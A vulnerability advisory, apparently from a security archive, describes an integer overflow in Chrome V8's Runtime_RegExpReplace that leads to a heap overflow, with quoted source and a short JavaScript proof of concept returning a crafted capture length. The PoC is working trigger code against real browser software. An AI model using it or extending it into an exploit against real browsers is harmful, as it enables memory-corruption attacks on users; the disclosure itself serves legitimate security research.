Chrome V8 Runtime_RegExpReplace Integer Overflow

Chrome V8 suffers from a Runtime_RegExpReplace integer overflow vulnerability.


MD5 | 6eecead5f17d54fb399a387633a037f1

Chrome: V8: Integer overflow in Runtime_RegExpReplace 




Here's a snippet of the method.
ASSIGN_RETURN_FAILURE_ON_EXCEPTION(
isolate, captures_length_obj,
Object::ToLength(isolate, captures_length_obj));
const int captures_length = PositiveNumberToUint32(*captures_length_obj);
...
if (functional_replace) {
const int argc =
has_named_captures ? captures_length + 3 : captures_length + 2; <<-- (a)

ScopedVector<Handle<Object>> argv(argc);

int cursor = 0;
for (int j = 0; j < captures_length; j++) {
argv[cursor++] = captures[j];
}

// (b)
argv[cursor++] = handle(Smi::FromInt(position), isolate);
argv[cursor++] = string;

The variable "captures_length" is user-controlled, so an integer overflow may occur at (a) which causes a heap overflow at (b).


PoC:
let cnt = 0;
let reg = /./g;
reg.exec = () => {
if (cnt++ == 0)
return {length: 0xfffffffe};

cnt = 0;
return null;
};

''.replace(reg, () => {});

This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available, the bug report will become
visible to the public.




Found by: lokihardt


Related Posts